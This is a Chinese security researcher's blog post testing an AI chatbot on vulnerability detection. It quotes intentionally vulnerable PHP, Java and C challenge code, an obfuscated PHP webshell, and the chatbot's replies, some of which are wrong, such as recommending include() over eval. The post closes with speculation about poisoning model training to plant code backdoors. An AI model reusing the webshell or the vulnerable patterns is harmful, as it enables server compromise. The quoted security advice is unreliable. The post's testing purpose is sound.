2022-12-4 21:31:7 Author: 黑哥虾撩(查看原文) 阅读量:13 收藏












因为受到推特的用户及经验主义影响,自然而然的觉得应该不支持中文,所以开始使用都用Google翻译成英文去提问,结果到我输入法切换问题,直接输入了个“你好”,然后居然给了我中文的回应 如下图




Is there a bug in this code? <?php echo("$_GET['abc']")?>


It is difficult to determine if there is a bug in this code without more information. The code you provided is a PHP script that uses the $_GET variable to access a value passed to the script through a URL query string parameter called abc. This value is then passed to the echo() function, which outputs the value to the screen.

One potential issue with this code is that it does not properly escape the $_GET variable when it is passed to the echo() function. This could allow a malicious user to insert arbitrary code into the abc parameter, which could be executed by the PHP script. To avoid this issue, the $_GET variable should be properly escaped using the htmlspecialchars() function before being passed to the echo() function.



HttpServer srv = HttpServer.create(new InetSocketAddress(9000), 0);
srv.createContext("/", new HttpHandler() { @Override public void handle(HttpExchange he) throws IOException { String ret = "<!DOCTYPE html><html><head><title>Comments</title></head><body><table>"; try { ResultSet rs = statement.executeQuery("select * from comments"); while ( { String comment = rs.getString("comment").replace("<", "&lt;").replace(">", "&gt;"); ret += "<tr><td>" + Normalizer.normalize(comment, Normalizer.Form.NFKC) + "</td></tr>\n"; } Main.response(he, 200, ret + "</table></body></html>"); } catch (Exception exp) { System.out.println(exp); Main.response(he, 500, "Internal Server Error"); } }});

srv.createContext("/comment", new HttpHandler() { @Override public void handle(HttpExchange he) throws IOException { try { JSONObject jsonObject = (JSONObject)(new JSONParser()).parse(new InputStreamReader(he.getRequestBody(), "UTF-8")); PreparedStatement stmt = finalConnection.prepareStatement("insert into comments values(?)"); stmt.setString(1, (String)jsonObject.get("comment")); stmt.executeUpdate(); Main.response(he, 200, "Ok"); } catch (Exception exp) { Main.response(he, 500, "Internal Server Error"); } }});srv.start();

Is there a vulnerability in this code?


It is difficult to determine if there are vulnerabilities in this code without more information. The code you provided is a Java server that uses the HttpServer class from the Java SE package to create an HTTP server that listens on port 9000. The server defines two HTTP contexts: "/" and "/comment".

One potential issue with this code is that it does not properly validate or sanitize user input. The handle() method of the HttpHandler implementation for the "/comment" context parses a JSON object from the request body and inserts it into the comments table of a database. However, the code does not check the contents of the "comment" field of the JSON object to ensure that it does not contain any potentially malicious code. This could allow a malicious user to insert arbitrary SQL code into the comments table, potentially compromising the security of the database. To avoid this issue, the code should properly validate and sanitize user input before inserting it into the database.



<?php  $text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";    if(preg_match("/flag/",$file)){        echo "Not now!";        exit();     }else{        include($file);  //useless.php        $password = unserialize($password);        echo $password;    }}else{    highlight_file(__FILE__);}?>Is there a vulnerability in this code?


It is difficult to determine if there are vulnerabilities in this code without more information. The code you provided is a PHP script that uses the $_GET superglobal variable to access query string parameters passed to the script. The script then performs a series of checks on the values of these parameters and takes different actions based on the results of those checks.

One potential issue with this code is that it does not properly validate or sanitize user input. The script includes a file whose name is specified by the file parameter of the query string, and echoes the value of the password parameter without any validation or sanitization. This could allow a malicious user to insert arbitrary code into the file parameter, potentially compromising the security of the server. Additionally, echoing the password parameter without proper validation or sanitization could expose sensitive information. To avoid these issues, the code should properly validate and sanitize user input before using it.



#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>

char* Note[10];void init_buf(){ setbuf(stdin, 0); setbuf(stdout, 0); setbuf(stderr, 0);}

unsigned long get_number(){ unsigned long re = 0; scanf("%lu", &re);

return re;}

void menu(){ printf("1. Add Note\n"); printf("2. Delete Note\n"); printf("3. Show Note\n"); printf("4. Exit\n"); printf("5. Edit Name\n"); printf("Choice > ");}void Add_note(){ printf("Index: "); unsigned int index = get_number(); if (index < 9) { printf("Size: "); unsigned int size = get_number(); char* temp = (char*)malloc(size); if (temp) { printf("Context: "); Note[index] = temp; read(0, Note[index], size); } }}void Del_note(){ printf("Index: "); unsigned long index = get_number(); free(Note[index]); Note[index]=0;}void Show_note(){ printf("Index: "); unsigned int index = get_number(); if (index < 9 && Note[index]) { printf("Context: %s", Note[index]); }}

void Edit_show_name(char *name){ read(0,name,0x30); printf("Hello,%s\n",name); return;}

int main(void){ init_buf(); char name[0x30]; while (1) { menu(); switch (get_number()) { case 1: Add_note(); break; case 2: Del_note(); break; case 3: Show_note(); break; case 4: goto exit_tag; break; case 5: Edit_show_name(name); break; default: puts("Error Input."); break; } }exit_tag: return 0;}

Is there a vulnerability in this code?


It is difficult to determine if there are vulnerabilities in this code without more information. The code you provided is a C program that implements a simple menu-driven application for managing notes. The program defines several functions for adding, deleting, and displaying notes, as well as a function for editing the user's name.

One potential issue with this code is that it does not properly validate user input. The get_number() function uses the scanf() function to read an unsigned long integer from standard input without any bounds checking. This could allow a malicious user to supply a large number that could cause a buffer overflow or other issues. Additionally, the Add_note() function does not check the size of the user-supplied buffer before allocating memory for it and reading input into it. This could allow a malicious user to allocate a large amount of memory, potentially leading to a denial of service attack. To avoid these issues, the code should properly validate user input to ensure that it is within the expected range and does not exceed any allocated buffers.



<?php $__=('>'>'<')+('>'>'<'); $_=$__/$__; $____=''; $___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__}); $_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_}); $_=$$_____; $____($_[$__]);


This code is using a combination of variable names, string concatenation, and the eval() function to execute code. It is difficult to determine the exact purpose or behavior of this code without more context.

One potential issue with this code is that it uses the eval() function, which is often considered a security vulnerability because it allows arbitrary code to be executed. Using the eval() function can make it difficult to ensure that the code being executed is safe, and it can potentially expose the server to attacks. Additionally, the code uses a series of complex and obfuscated variable assignments and string concatenations to construct the input to the eval() function, which makes it difficult to understand and analyze the code. To avoid these issues, it is generally recommended to avoid using the eval() function, and to use safer alternatives like include() or require() to execute external PHP code. It is also recommended to write code in a clear and readable manner to make it easier to understand and analyze.



在以往的一些项目里比如啥子微软bing的小冰啥的,国内的那些啥子小爱同学啥的智能音箱啥的都基本上算一个问题一个问题,它们不会去关联上下文,但是OpenAI这个就很明显,比如前面因为测试漏洞检测,提交了太多的PHP代码,于是我在测试代码生成的时候,它就默认给我输出了PHP的代码 ...

还有在前面我提到了一个IP地址是测试另外的问题的,然后在后面输出的代码案例里,它自动就使用了前面提到的这个IP地址作为例子, 由此可见你输入的这些测试问题,都已经在不断进入学习流程。


在外面404里面很多小伙伴都遇到一个的“艰难”的问题,就是面向“黑哥编程”,因为我经常性的有一些临时需求写一些小脚本,虽然脚本简单有时候可能因为沟通理解上的问题也非常难缠,以至于在我们小伙在写招聘启事里都写名:面向黑哥编程 ...



当然这个例子没有说明是py2还是py3,要不是我机智,差点我就给它差评了!哈哈 果然还是我最聪明 ...







我平时不太喜欢的搞安全的人一些装x陋习,比如不管是啥场景,啥地点,去干啥一看到有一个屏幕的自助机,就想去弹个啥软键盘出来,还要拍个照发个朋友圈的行为(我只是说我不太喜欢,大家不要对号入座 哈哈)


另外一个点就是污染的问题,这个有点类似Google翻译那种事情,是不是也可以通过大量提交污染的答案,就需要大家的测试了,当然如果真的存在,日后在这种OpenAI写的代码里植入点后门啥的 或许也有这种可能性?





